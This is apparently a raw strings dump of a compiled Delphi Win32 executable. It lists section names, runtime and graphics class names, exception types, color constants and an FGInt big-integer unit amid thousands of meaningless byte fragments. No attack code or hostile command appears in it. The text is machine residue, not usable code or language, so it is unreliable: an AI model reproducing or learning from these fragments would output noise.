MZP
This program must be run under Win32
^B*
CODE
`DATA
BSS
.idata
.tls
.rdata
P.reloc
P.rsrc
Integer
Cardinal
String
d=@
p=@
t=@
x=@
l=@
TObject
TObject
System
IInterface
System
d=@
Ha@
Ta@
x=@
l=@
da@
TInterfacedObject
%|AD
%xAD
%tAD
%pAD
%lAD
%hAD
%dAD
%`AD
%\AD
%XAD
%TAD
%PAD
%LAD
%HAD
%DAD
%@AD
%<AD
%8AD
D$,
\$0
%4AD
%0AD
%,AD
%(AD
%$AD
% AD
u:hD
SVWUQ
Z]_^[
SVWU
wb;
YZ]_^[
SVW
_^[
SVWU
]_^[
SVWU
;D$
w;;t$
;D$
+D$
]_^[
SVWU
;|$
]_^[
SVWUQ
Z]_^[
SVWU
3;{
YZ]_^[
SVWU
uW;{
u:;{
]_^[
SVW
_^[
=E D
 &D
ZYYd
=E D
=E D
 &D
ZYYd
=E D
 &D
 &D
SVW
_^[
SVWU
]_^[
SVW
_^[
SVW
 &D
_^[
YZ[
YZ^[
SVWU
]_^[
SVW
UhP"@
=E D
ZYYd
hW"@
=E D
_^[YY]
QSVW
=E D
u,)
ZYYd
=E D
_^[Y]
SVWU
;D$
$;L$
$)D$
t!%
YZ]_^[
QSVW
=E D
ZYYd
=E D
_^[Y]
PRQ
YZXu
SVWU
< v
;"u
C<"u1S
<"u
< w
Q<"u8S
7CF;
<"u
7CF;
< w
]_^[
SVW
_^[
,$YXZ
=( D
( D
+f=
x+@
SVQ
Z^[
Ht Ht.
F$X+@
FHP
Huv
x+@
SHY
QSVW
uXj
#;u
_^[Y]
r/f=
w)f%
H D
SVQ
uENt
u0Nt
u%Nt
v-f=
w'j
v)f=
w#j
H D
XtO
t4B
SVWQ
Xt[
I|.
J+S
_^[
SVW
@Gf
CHP
_^[
SVW
tl1
-tb
+t_
$t_
xtZ
XtU
xtH
XtC
w%9
~KxI[)
2_^[
w"j
ZHu
PRQ
YZXt5
YX_^
@~d
@PQ
                                                                
SVQ
Z^[
SS7@
SS7@
I7@
@v:k
n2x
@aQY
U@:
x9?
E@|o
BkU'9
|B0
/j\
9;5
hT:@
uM3
Uh-:@
hp:@
ZYYd
h4:@
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
SVW
_^[
SVW3
Uh\<@
ZYYd
hc<@
_^[YY]
2;0u
YXt
RQS
[YZ
D$,
jjj
PPRTj
PRQ
QTj
YYZX
RTj
RQP
YZXtp
VWUd
SPRQ
T$(j
|$(
 @@
SVWU
]_^[
RQP
YZXtm1
SPRQ
T$(
Ph|A@
|$(
SVWU
]_^[
ZTUWVSPRTj
D$0
{B@
]_^[
d$,1
,t\=
tW-
t\-
t=HtN
r6t0
t=-
t.Ht
Ht$
=t&
lC@
4&D
4&D
SVW
0&D
ZYYd
_^[]
SVW
8&D
<&D
ZYYd
_^[]
8&D
<&D
@&D
, D
4 D
^_[
^_[
SVW
_^[
0&D
=D D
tWf
= "D
0"D
SVWU
0&D
@ D
=$ D
$ D
]_^[
~$P
SVW
;_^[
PQj
PQj
SVWU
}(V
]_^[
t!R:
BBB
t-Rf;
t f;J
f;J
f;J
WPQ
SVW
_^[
t\;
SVW
_^[
SVWRP
Z_^[X
SVW
uXJt
uAJt
u:Jt
_^[
mL@
It2S
t&J|
SVW
N|*9
~")
_^[
t1SVW
_^t
_^[
SVW
;_^[
QRP
SVWU
}(V
]_^[
PQR
t-Rf;
t f;J
f;J
f;J
SVW
uAJt
Zf9
_^[
SVW
_^[]
SVW
_^[
_^[
SVW
t"<
t$<
t3<
tM<
_^[
]_^[
_^[
PSVW
t%<
t><
tQ<
t\<
tv<
_^[X
_^[X
_^[
SVW
t"<
t-<
t8<
tC<
t]<
to<
_^[
_^[
SVWU
]_^[
]_^[
SVWU
]_^[
7Mu
]_^[
USVW1
_^[]
USVW1
_^[]
SVW
|"G
_^[
SVW
_^[
u'P
u+h
SVW
t@h
t/h
8\u8
@PV
ttV
_^[
kernel32.dll
GetLongPathNameA
hL_@
hL_@
hh_@
Uh!^@
ZYYd
h(^@
;.t
Software\Borland\Locales
Software\Borland\Delphi\Locales
SVW
t93
UhW`@
ZYYd
_^[YY]
ZYYd
^[]
";M
FFF;M
^[YY]
tl;u
 t.
B@;u
G;u
t0;u
@;u
ZYYd
^[Y]
Uh/e@
ZYYd
h6e@
^[Y]
ZYYd
^[Y]
}*h
UhJf@
ZYYd
hQf@
H D
ZYYd
F D
hV@
L D
< D
8 D
0 D
Pj@
\&D
u&d
h&D
`&D
`&D
d&D
ZYYd
-d&D
l&D
ZYYd
-l&D
%<BD
%8BD
%4BD
%0BD
%,BD
%(BD
%$BD
% BD
%@CD
%<CD
%8CD
%4CD
%0CD
%,CD
%(CD
%$CD
% CD
%|BD
%xBD
%tBD
%pBD
%lBD
%hBD
%dBD
%`BD
%\BD
%XBD
%TBD
%PBD
%LBD
%HBD
%DBD
%|CD
%xCD
%tCD
%pCD
%lCD
%hCD
%dCD
%`CD
%\CD
%XCD
%TCD
%PCD
%LCD
%HCD
%TDD
%PDD
%XDD
%LDD
%HDD
%DDD
%@DD
%<DD
%8DD
%4DD
%0DD
%,DD
%(DD
%$DD
% DD
QRP
p&D
ZYYd
-p&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
Uh)q@
t&D
ZYYd
h0q@
-t&D
@q@
TFileName
Pq@
TSearchRecX
<q@
d=@
p=@
t=@
x=@
l=@
Exception r@
 r@
lq@
d=@
p=@
t=@
x=@
l=@
EAbort
tr@
tr@
lq@
d=@
p=@
t=@
x=@
l=@
EHeapException
(r@
d=@
p=@
t=@
x=@
l=@
EOutOfMemory
,s@
,s@
lq@
d=@
p=@
t=@
x=@
l=@
EInOutError
lq@
d=@
p=@
t=@
x=@
l=@
EExternal
8s@
d=@
p=@
t=@
x=@
l=@
EExternalException
<t@
<t@
8s@
d=@
p=@
t=@
x=@
l=@
EIntError
d=@
p=@
t=@
x=@
l=@
EDivByZero
d=@
p=@
t=@
x=@
l=@
ERangeErrorDu@
Du@
d=@
p=@
t=@
x=@
l=@
EIntOverflow
8s@
d=@
p=@
t=@
x=@
l=@
EMathError
Tu@
d=@
p=@
t=@
x=@
l=@
EInvalidOp
Pv@
Pv@
Tu@
d=@
p=@
t=@
x=@
l=@
EZeroDivide
Tu@
d=@
p=@
t=@
x=@
l=@
EOverflow
Tu@
d=@
p=@
t=@
x=@
l=@
EUnderflow
Xw@
Xw@
(r@
d=@
p=@
t=@
x=@
l=@
EInvalidPointer
lq@
d=@
p=@
t=@
x=@
l=@
EInvalidCast
lq@
d=@
p=@
t=@
x=@
l=@
EConvertError
lx@
lx@
8s@
d=@
p=@
t=@
x=@
l=@
EAccessViolation
8s@
d=@
p=@
t=@
x=@
l=@
EPrivilege
$y@
$y@
8s@
d=@
p=@
t=@
x=@
l=@
EStackOverflow
8s@
d=@
p=@
t=@
x=@
l=@
EControlC
lq@
d=@
p=@
t=@
x=@
l=@
EVariantError
4z@
4z@
lq@
d=@
p=@
t=@
x=@
l=@
EAssertionFailed
lq@
d=@
p=@
t=@
x=@
l=@
EAbstractError
lq@
d=@
p=@
t=@
x=@
l=@
EIntfCastError
L{@
L{@
lq@
d=@
p=@
t=@
x=@
l=@
EOSError
lq@
d=@
p=@
t=@
x=@
l=@
ESafecallException
.74
SysUtils
.84
SysUtils
X|@
X|@
d=@
p=@
t=@
x=@
l=@
TThreadLocalCounter
m|@
u|@
}|@
4}@
4}@
d=@
Ha@
Ta@
x=@
l=@
da@
$TMultiReadExclusiveWriteSynchronizer
SVW
_^[
SVW
<ar
<zw
BFK
_^[
SVW
<Ar
<Zw
BFK
_^[
@_^
VWS
[_^
SVW
_^[
SVWU
]_^[
-AN
RV1
YZ)
2Ju
-NA
<$f
,$f
0<:r
2Ju
 ^]
SVQ
Z^[
u)j
u)j
True
False
QSVW
| F
_^[Y]
SVW
@w2j
_^[
jjh
SVWQ
PWVS
$Z_^[
SVWQ
PWVS
$Z_^[
^[YY]
t4P
QQQQS
Uh0
ZYYd
C,P
YZ[
SVW
_^[
@^[
SVWU
]_^[
SVW3
ZYYd
_^[YY]
.\:
SVW
_^[
SVW
_^[
SVW
_^[
.\:
WVS
[^_
WVS
<ar
<zw
[^_
WVS
It.
[^_
SVW
D$ 
D$$
T$ 
(_^[
SVW
<%t
<%t
<-u
<:u
<.u
<*t"<0r=<9w9i
0J@
Gt?
Et8
SPR
_^[[
SVW
_^[]
WVS
~&D
x&D
|&D
}&D
[^_
INFNAN
<@t
QS<$t
<*t
[YC
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
WVS
u"f
00f
5r%
?0t
[^_
WVS
<Eu
< t
[^_
jjj
sMf
<sGf
<sAf
^YY]
SVW
_^[YY]
SVW
_^[
SVW
'w~f
rxf
wrf
f;\F
AHu
_^[YY]
SVW
$YZ_^[
fkE
f;M
f)M
^Y]
@YY]
Y[]
Y^[
SV3
<'D
uzS
=@'D
ZYYd
SV3
80u
ZYYd
yyyy
SV3
UhY
<Mu
t%HtIHtm
"tc
u(f
u(f
u4f
u2U
u2U
ZYYd
AM/PM
A/P
AMPM
AAAA
AAA
SVW
_^[
SVW
_^[
SVW3
Uh-
ZYYd
_^[YY]
SVWQ
Z_^[
SVW
,Dt
_^[
SVWUQ
H'D
d'D
$Z]_^[
=<'D
SVW3
8gu4
d'D
Yfk
~5f
=D'D
ZYYd
_^[
ddd
SVWU
|$f
tFf
w>f
]_^[
SVQ
Z^[
SVW
_^[
jh2
QRP
SVWQ
PVW
Z_^[
QSVW
_^[Y]
QQQQQQSVW3
CDH
C8H
ZYYd
_^[
SV3
D'D
D'D
^[]
SV3
Uhu
t,C
`'D
`'D
ZYYd
^[Y]
s<j
d'D
ZYYd
^Y]
QQQQQSVW
<'D
,Gt
, t
,Yt
, u
ZYYd
_^[
ggg
yyyy
eeee
SVW
u#h
`&D
lq@
`&D
_^[
L$H
D$DP
D$HP
D$L
D$PPj
6j@
`&D
D$LPj
SVW
_^[
SVW
UhR
ZYYd
_^[Y]
SVW
_^[
SVW
Uh 
ZYYd
_^[YY]
TErrorRec
YZ^[
TExceptRec
SVW3
ZYYd
_^[
Hz@
,tY=
tS-
tU-
t<HtH
r3t7
t5-
t(Ht
SV3
 x@
 x@
ZYYd
UhW
8s@
ZYYd
lq@
=D'D
=D'D
SVW
=D'D
@G;
_^[
SVW
C;]
u#;]
_^[
=D'D
t.T
K;\$
$YZ^[
=D'D
t&T
$YZ^[
=D'D
=D'D
=D'D
SVWU
]_^[
SVWU
=D'D
 C;
]_^[
SVWU
WUWSj
YZ]_^[
SVW
_^[
ZYYd
QSVW
8'D
_^[Y]
<'D
SVW
8'D
<'D
@'D
8'D
<'D
@'D
E'D
D'D
D'D
E'D
@B=
8'D
E'D
.jJ
E'D
D'D
Y_^[
Uhw
=D'D
x&D
|&D
}&D
~&D
F'D
ZYYd
m/d/yy
mmmm d, yyyy
 AMPM
AMPM 
:mm
:mm:ss
%`DD
ZYYd
Sh0
kernel32.dll
GetDiskFreeSpaceExA
SVWU
]_^[
SVWUQ
(Z]_^[
jjjj
SVWUQ
;w$t|
Z]_^[
u 3
SVQ
;F$t=
Z^[
;C$t4
H'D
x&D
ZYYd
Uh4
=]&D
ZYYd
Uhq
ZYYd
%|DD
%xDD
UhR
ZYYd
[Y]
ZYYd
[Y]
Uh*
ZYYd
[Y]
ZYYd
[Y]
ZYYd
[Y]
ZYYd
[YY]
ZYYd
[Y]
Uhd
ZYYd
[Y]
ZYYd
[Y]
%tDD
%pDD
%lDD
%hDD
Qh,
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarOr
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
Uhe
ZYYd
d=@
p=@
t=@
x=@
l=@
4*@
4*@
TCustomVariantType
TCustomVariantType
Variants
d=@
p=@
t=@
x=@
l=@
EVariantInvalidOpError
d=@
p=@
t=@
x=@
l=@
EVariantTypeCastError
d=@
p=@
t=@
x=@
l=@
EVariantOverflowError
d=@
p=@
t=@
x=@
l=@
EVariantInvalidArgErrorx
d=@
p=@
t=@
x=@
l=@
EVariantBadVarTypeError
d=@
p=@
t=@
x=@
l=@
EVariantBadIndexError
d=@
p=@
t=@
x=@
l=@
EVariantArrayLockedError
d=@
p=@
t=@
x=@
l=@
EVariantArrayCreateError
d=@
p=@
t=@
x=@
l=@
EVariantNotImplError
d=@
p=@
t=@
x=@
l=@
EVariantOutOfMemoryError
d=@
p=@
t=@
x=@
l=@
EVariantUnexpectedError@
d=@
p=@
t=@
x=@
l=@
EVariantDispatchError
ZYYd
SV3
Uh;
ZYYd
ZYYd
SV3
Uh+
ZYYd
ZYYd
tW-
t?Htb
ZYYd
Uhj
ZYYd
^[]
SVW
|kC3
_^[
SVQ
Z^[
^[]
SVW
|kC3
_^[
SVWQ
Z_^[
t6f
u&f
QQQQSV
rOt
ZYYd
SV3
UhW
Uh5
ZYYd
ZYYd
ZYYd
Uh=
ZYYd
ZYYd
SV3
Uh:
ZYYd
ZYYd
ZYYd
Uhd
UhG
ZYYd
ZYYd
QSV
ZYYd
Empty
Null
Smallint
Integer
Single
Double
Currency
Date
OleStr
Dispatch
Error
Boolean
Variant
Unknown
Decimal
$0F
ShortInt
Byte
Word
LongWord
Int64
SVW3
Uh~
ZYYd
_^[
String
Any
Array 
ByRef 
.02
Variants
h (D
Uhq
ZYYd
h (D
^[]
SVWQ
Z_^[
SVW
f;{
_^[YY]
QSVW
S83
_^[Y]
SVWUQ
Z]_^[
h (D
ZYYd
h (D
YY]
QSVW
t~h (D
Uh\
ZYYd
h (D
_^[Y]
h (D
ZYYd
h (D
ZYYd
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
UhE
8(D
ZYYd
-8(D
False
True
<(D
ZYYd
-<(D
@(D
ZYYd
-@(D
lq@
d=@
p=@
t=@
x=@
l=@
EStreamError
d=@
p=@
t=@
x=@
l=@
EFileStreamError
d=@
p=@
t=@
x=@
l=@
EFCreateError
d=@
p=@
t=@
x=@
l=@
EFOpenError
d=@
p=@
t=@
x=@
l=@
EFilerError(
d=@
p=@
t=@
x=@
l=@
EReadError
d=@
p=@
t=@
x=@
l=@
EWriteError
lq@
d=@
p=@
t=@
x=@
l=@
EResNotFound
lq@
d=@
p=@
t=@
x=@
l=@
EListError
lq@
d=@
p=@
t=@
x=@
l=@
EStringListError
d=@
p=@
t=@
x=@
l=@
EOutOfResourcesH
lq@
d=@
p=@
t=@
x=@
l=@
EInvalidOperation
d=@
p=@
t=@
x=@
l=@
TList
d=@
p=@
t=@
x=@
l=@
TThreadListd
d=@
p=@
t=@
x=@
l=@
TPersistent
TPersistentd
Classes
d=@
t=@
x=@
l=@
TInterfacedPersistent
TInterfacedPersistentT
Classes
IStringsAdapter
Classes
d=@
p=@
t=@
x=@
l=@
@ A
x"A
p!A
4*@
4*@
\%A
,*A
d-A
p A
4*@
4*@
4*@
H(A
H)A
8+A
TStrings
TStrings@
Classes
TStringItem
d=@
p=@
t=@
x=@
l=@
x"A
p!A
L0A
\%A
X2A
,3A
H3A
T/A
 1A
01A
H(A
H)A
8+A
p.A
t3A
TStringList
TStringListp
Classes
d=@
p=@
t=@
x=@
l=@
X4A
p4A
4*@
4*@
TStream
d=@
p=@
t=@
x=@
l=@
THandleStream
d=@
p=@
t=@
x=@
l=@
TFileStream
d=@
p=@
t=@
x=@
l=@
X4A
p4A
4*@
8:A
TCustomMemoryStream`
d=@
p=@
t=@
x=@
l=@
8;A
p4A
8:A
d;A
TMemoryStream
d=@
p=@
t=@
x=@
l=@
t=A
X4A
p4A
8:A
TResourceStream
TIdentMapEntry
SVW
_^[]
d=@
p=@
t=@
x=@
l=@
TRegGroup
d=@
p=@
t=@
x=@
l=@
TRegGroups
QSVW
_^[Y]
SVW
QHK
_^[
SVW
_^[
SVWU
GMu
]_^[
SVWU
]_^[
T(D
T(D
ZYYd
T(D
d=@
p=@
t=@
x=@
l=@
TIntConst
SVW
P(D
_^[
QSVW
|#F
_^[Y]
SVW
_^[YY]
SVW
_^[
SVW
_^[
YZ^[
ZYYd
^[Y]
A;H
SVWU
MGu
]_^[
ZYYd
YY]
Uh<
ZYYd
[Y]
ZYYd
[Y]
SV3
ZYYd
nil
SVW3
Uhi
ZYYd
_^[
SVWU
]_^[
SVW
_^[
SVW3
Uh_!A
UhB!A
|-F3
W<CNu
ZYYd
hI!A
ZYYd
hf!A
_^[
QSV
Q@3
ZYYd
^[Y]
^[]
Ph0*A
[YY]
Strings
SVW3
Uhm#A
|0F3
CNu
ZYYd
ht#A
_^[
YZ^[
SVW
ZYYd
_^[Y]
SVW3
S$3
ZYYd
ZYYd
_^[
UhM%A
ZYYd
hT%A
[Y]
SVW3
Uhg&A
|2F
|XF
ZYYd
hn&A
_^[
SVW3
|,F
ZYYd
_^[
SV3
|g@
ZYYd
SVWU
FKu
]_^[
QSVW
S$_^[Y]
Ql3
ZYYd
^Y]
SV3
Uh9)A
Q,3
ZYYd
h#)A
ZYYd
h@)A
^[YY]
SVW3
QHW
Sd3
ZYYd
ZYYd
_^[YY]
SVWUQ
QHU
SdZ]_^[
ZYYd
ZYYd
Uh++A
Qx3
ZYYd
h2+A
^Y]
ZYYd
^[Y]
Q,3
ZYYd
^[Y]
ZYYd
ZYYd
[YY]
SVW3
UhV-A
FKu
ZYYd
h]-A
_^[
F$3
S<[
SVWUQ
$Z]_^[
S [
S([
SVW
_^[
SVWU
;t$
;t$
]_^[
SVW
_^[
Q(^
SVQ
$Z^[
Sd^[
SVW
_^[]
SVW
_^[]
SVW
_^[
SVW
_^[
CN;
S4[
`3A
SVf
^[YY]
SVW
_^[
SVW
_^[
SVW
UhP7A
ZYYd
hW7A
_^[
SVW
_^[
YY]
^[]
SVW3
ZYYd
_^[
SVW
_^[
ZYYd
[Y]
SVW
_^[
SVW
_^[
SVWU
~,;{
]_^[
SVW
_^[]
ZYYd
QSVW
_^[Y]
SVW
=\(D
\(D
Uh_>A
ZYYd
hf>A
\(D
_^[YY]
QSVW
=\(D
\(D
ZYYd
\(D
_^[Y]
VWS
[_^
SVQ
Z^[
SV3
ZYYd
^[YY]
jjj
ZYYd
Uh$BA
ZYYd
h+BA
[Y]
[Y]
UhsDA
]DA
tCA
]DA
]DA
]DA
%DA
4DA
BDA
QDA
ZYYd
hzDA
YY]
ZYYd
[Y]
VWS
[_^
SVWQ
Z_^[
UhaFA
ZYYd
hhFA
^[Y]
h`(D
H(D
=H(D
h`(D
H(D
SVW
P(D
Uh%GA
FKu
ZYYd
h,GA
P(D
P(D
_^[]
L(D
`&D
D(D
\(D
T(D
D(D
<GA
X(D
D(D
ZYYd
Uh}HA
-L(D
<GA
D(D
T(D
P(D
\(D
ZYYd
SVW
_^[
SVW
3_^[]
SVW
3_^[]
SVW
3_^[]
SVW
3_^[]
SVW3
_^[
SVWU3
]_^[
SVWU
D$ Pj
D$$Pj
p $
D$(Pj
D$,Pj
D$0Pj
D$4Pj
D$8Pj
D$<Pj
D$@Pj
D$DPj
D$HPj
D$LPj
D$PPj
D$TPj
D$XPj
D$ Pj
hb%
D$4Pj
D$HPj
hQZ^&
D$0Pj
D$DPj
D$XPj
D$,Pj
D$@Pj
D$TPj
D$(Pj
D$<Pj
D$PPj
D$$Pj
D$8Pj
D$LPj
D$0Pj
hB9
D$<Pj
D$HPj
h"a
D$TPj
D$ Pj
D$,Pj
D$8Pj
h`K
D$DPj
D$PPj
D$(Pj
D$4Pj
D$@Pj
D$LPj
D$XPj
D$$Pj
heV
hD")
D$8Pj
D$TPj
D$0Pj
D$LPj
Y[e
D$(Pj
D$DPj
D$ Pj
D$<Pj
hO~
D$XPj
D$4Pj
D$PPj
D$,Pj
D$HPj
D$$Pj
D$@Pj
X]_^[
#Eg
vT2
SVWU
C?;
]_^[
YZ^[
SVW3
CNu
ZYYd
h$SA
_^[YY]
SVW
X_^[
x(D
ZYYd
-x(D
YY]
|(D
ZYYd
h TA
-|(D
0TA
FGInt
PTA
TFGInt
,TA
SVW3
ZYYd
_^[YY]
SVW3
ZYYd
_^[
SVW
GKu
ZYYd
_^[
SV3
ZYYd
SVWUQ
LYA
XYA
80t
XYA
Z]_^[
SVW
UhxZA
80u
,TA
F;u
ZYYd
_^[YY]
SVW3
Uhv[A
FKu
80u
ZYYd
h}[A
_^[
SVW
r)i
;0t
,TA
0_^[YY]
QSVW
UhU^A
,-t
l^A
H~%
x^A
,TA
GNu
x^A
ZYYd
h\^A
_^[
SV3
LTA
80t
ZYYd
LTA
,TA
SVWQ
$Z_^[
SVW
;D$
,TA
BIu
r#A
BIu
;8t
,TA
,TA
BIu
r3A
BIu
;|$
,TA
_^[
SVW
_^[
SVWU
,TA
FMu
,TA
]_^[
SVWU
;0t
,TA
]_^[
SVWU
]_^[
,TA
,TA
SVQ
,TA
Z^[
SVW
@Ju
,TA
_^[
SVW
@Ku
@Ku
,TA
_^[
SVW
CIu
r-A
CIu
;\$
,TA
_^[
SVWU
,TA
;D$
,TA
 ]_^[
SVWU
$@P
,TA
$t#
$@P
,TA
 ]_^[
SVWQ
,TA
@Ju
Z_^[
SVW
LTA
LTA
LTA
LTA
,TA
(oA
;8s
,TA
(oA
4oA
ZYYd
LTA
_^[
LTA
LTA
LTA
LTA
ZYYd
LTA
SVW
LTA
UhErA
ZYYd
hLrA
LTA
_^[YY]
SVW
LTA
ZYYd
LTA
_^[YY]
SVW
LTA
Uh4sA
ZYYd
h;sA
LTA
_^[YY]
QSVW
,TA
CHu
,TA
_^[Y]
SVW
,TA
,TA
_^[
SVW
LTA
LTA
LTA
,TA
ZYYd
LTA
_^[
SVW3
LTA
LTA
LTA
LTA
LTA
,TA
CHu
1u2
ZYYd
LTA
_^[
LTA
LTA
LTA
LTA
ZYYd
LTA
SVWQ
Z_^[
SVW3
LTA
LTA
LTA
LTA
LTA
LTA
LTA
LTA
LTA
LTA
VC;
ZYYd
LTA
_^[
SVW
LTA
LTA
LTA
LTA
LTA
LTA
LTA
LTA
LTA
LTA
ZYYd
LTA
_^[
SVW
_^[
Uh}
ZYYd
SVW3
LTA
LTA
LTA
80u
ZYYd
LTA
_^[
111
SVW3
LTA
LTA
LTA
LTA
LTA
LTA
LTA
LTA
ZYYd
LTA
_^[
111
ZYYd
LTA
ZYYd
LTA
ZYYd
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
`&D
ZYYd
TColor
lq@
d=@
p=@
t=@
x=@
l=@
EInvalidGraphicx
lq@
d=@
p=@
t=@
x=@
l=@
EInvalidGraphicOperation
TFontPitch
fpDefault
fpVariable
fpFixed
Graphics
TFontName
TFontCharset
TFontStyle
fsBold
fsItalic
fsUnderline
fsStrikeOut
Graphics
TFontStyles
TPenStyle
psSolid
psDash
psDot
psDashDot
psDashDotDot
psClear
psInsideFrame
Graphics
TPenMode
pmBlack
pmWhite
pmNop
pmNot
pmCopy
pmNotCopy
pmMergePenNot
pmMaskPenNot
pmMergeNotPen
pmMaskNotPen
pmMerge
pmNotMerge
pmMask
pmNotMask
pmXor
pmNotXor
Graphics
TBrushStyle
bsSolid
bsClear
bsHorizontal
bsVertical
bsFDiagonal
bsBDiagonal
bsCross
bsDiagCross
Graphics
d=@
p=@
t=@
x=@
l=@
TGraphicsObject
TGraphicsObjectX
Graphics
IChangeNotifier
Graphics
d=@
p=@
t=@
x=@
l=@
TFont\
TFont,
Graphics
Charset
Color
Height
Name
Pitch
SizeT
Style
d=@
p=@
t=@
x=@
l=@
TPen
TPen
Graphics
Color
Model
Style
Width
d=@
p=@
t=@
x=@
l=@
TBrush
TBrush
Graphics
Color
Style
d=@
p=@
t=@
x=@
l=@
TCanvas
TCanvasl
Graphics
Brush
CopyModeX
Font
Pen
d=@
t=@
x=@
l=@
4*@
4*@
4*@
4*@
4*@
4*@
4*@
4*@
4*@
4*@
TGraphic
TGraphic
Graphics
d=@
t=@
x=@
l=@
TPicture
TPictureD
Graphics
d=@
p=@
t=@
x=@
l=@
4*@
TSharedImage
d=@
p=@
t=@
x=@
l=@
TMetafileImage
d=@
t=@
x=@
l=@
TMetafile
TMetafile
Graphics
d=@
p=@
t=@
x=@
l=@
TBitmapImage
d=@
t=@
x=@
l=@
TBitmapl
TBitmap
Graphics
d=@
p=@
t=@
x=@
l=@
TIconImage
d=@
t=@
x=@
l=@
TIcon
TIcon4
Graphics
d=@
p=@
t=@
x=@
l=@
TResourceManager
BIu
f;p
ZYYd
^[YY]
Uh+
ZYYd
SVW
ZYYd
_^[YY]
QSVW
Uh(
ZYYd
_^[Y]
clBlack
clMaroon
clGreen
clOlive
clNavy
clPurple
clTeal
clGray
clSilver
clRed
clLime
clYellow
clBlue
clFuchsia
clAqua
clWhite
clMoneyGreen
clSkyBlue
clCream
clMedGray
clActiveBorder
clActiveCaption
clAppWorkSpace
clBackground
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clDefault
clGradientActiveCaption
clGradientInactiveCaption
clGrayText
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clMenu
clMenuBar
clMenuHighlight
clMenuText
clNone
clScrollBar
cl3DDkShadow
cl3DLight
clWindow
clWindowFrame
clWindowText
ANSI_CHARSET
DEFAULT_CHARSET
SYMBOL_CHARSET
MAC_CHARSET
SHIFTJIS_CHARSET
HANGEUL_CHARSET
JOHAB_CHARSET
GB2312_CHARSET
CHINESEBIG5_CHARSET
GREEK_CHARSET
TURKISH_CHARSET
HEBREW_CHARSET
ARABIC_CHARSET
BALTIC_CHARSET
RUSSIAN_CHARSET
THAI_CHARSET
EASTEUROPE_CHARSET
OEM_CHARSET
ZYYd
ZYYd
[YY]
Uhy
ZYYd
[Y]
V;P
Uh!
ZYYd
ZYYd
Default
,^[
D$,
T$,
PjH
,^[
,^[
ZYYd
ZYYd
[YY]
Uh9
ZYYd
[Y]
ZYYd
V:P
Uh|
Uh_
ZYYd
ZYYd
[YY]
ZYYd
[Y]
ZYYd
SVW
G8P
G  
_^[
F8P
CPh
C8P
SVW
_^[
SVW
_^[
UhT
ZYYd
[Y]
C8P
KPh
YZ_^
SVW
_^[
YZ^[
SVQ
Z^[
S0[
S([
Uhj
ZYYd
tSj
ZYYd
SVW
Uhz
ZYYd
ZYYd
_^[
SVW
;],
;u(
E$P
E P
E$P
E(P
E,P
ZYYd
Uh@
 VS
E$P
E$P
E$P
PVSj
E P
E$PVSj
E(P
E,P
VSj
E(P
E,P
ZYYd
_^[
SVW
_^[
SVW
AOu
YZ_^[
Ix3
UhY
 jh
ZYYd
twj
"jh
ZYYd
[YY]
SVW
t8j
t+f
_^[
SVWQ
t6Tj
$Z_^[
SVW
ZYYd
ZYYd
ZYYd
_^[
SVW
_^[YY]
SVW
UhS
UhE
ZYYd
+;]
|&U
FOu
Uh3
`&D
ZYYd
ZYYd
ZYYd
_^[
SVW
TjTP
C ;C$s
T_^[
SVW
Uha
ZYYd
_^[
SVW
Uhr
UhK
ZYYd
ZYYd
_^[
@0P
@DPU
[YY]
Data
SVW
;T$
$ZXu
ZYYd
ZYYd
_^[
QT3
ZYYd
^Y]
QT^
QX3
ZYYd
^Y]
:P!t
QX^
TFileFormat
d=@
p=@
t=@
x=@
l=@
TFileFormatsList
QQQQSV
Uh=
ZYYd
wmf
emf
ico
bmp
SVWU
FMu
]_^[
SVW3
Uhc
ZYYd
_^[
SVW3
ZYYd
_^[
SVWU
]_^[
SVW
_^[
SVW
_^[
QSVW
Uh(
ZYYd
_^[Y]
QT^[
QX_^
^[]
S []
SVW3
Uh{
Q03
ZYYd
ZYYd
_^[
SVW
T$@
T$@
_^[
^[]
Pht
[YY]
Data
SVW
tj3
R$;
_^[
SVWU
$VW
]_^[
[(f
3TjdP
kD$TdP
D$PP
SVW
uWj
_^[
[(f
3TjdP
kD$PdP
D$LP
SVWQ
Z_^[
SVW
 EMFt
^(3
ZYYd
_^[
SVW
f;E
^(3
F(f
Pjd
ZYYd
_^[
ZYYd
ZYYd
.wmf
C(f
?TjdR
D$LPkD$XdPV
d^[
C(3
P ;p
C(3
C(f
?TjdR
D$HPkD$TdPV
d^[
SVW
|$( EMFt
d_^[
SVW
C(f
_^[
SVWQ
tm3
Z_^[
tpj
UhD
ZYYd
^[YY]
Uho
ZYYd
ZYYd
SVW
s(j
Pjd
_^[
SVW
_^[]
d=@
p=@
t=@
x=@
l=@
TBitmapCanvas
TBitmapCanvas
Graphics
t33
Uhf
ZYYd
ZYYd
QSV
ZYYd
^[Y]
SVW
_^[
ZYYd
[Y]
QSV
B`S
ZYYd
^[Y]
tzj
PSj
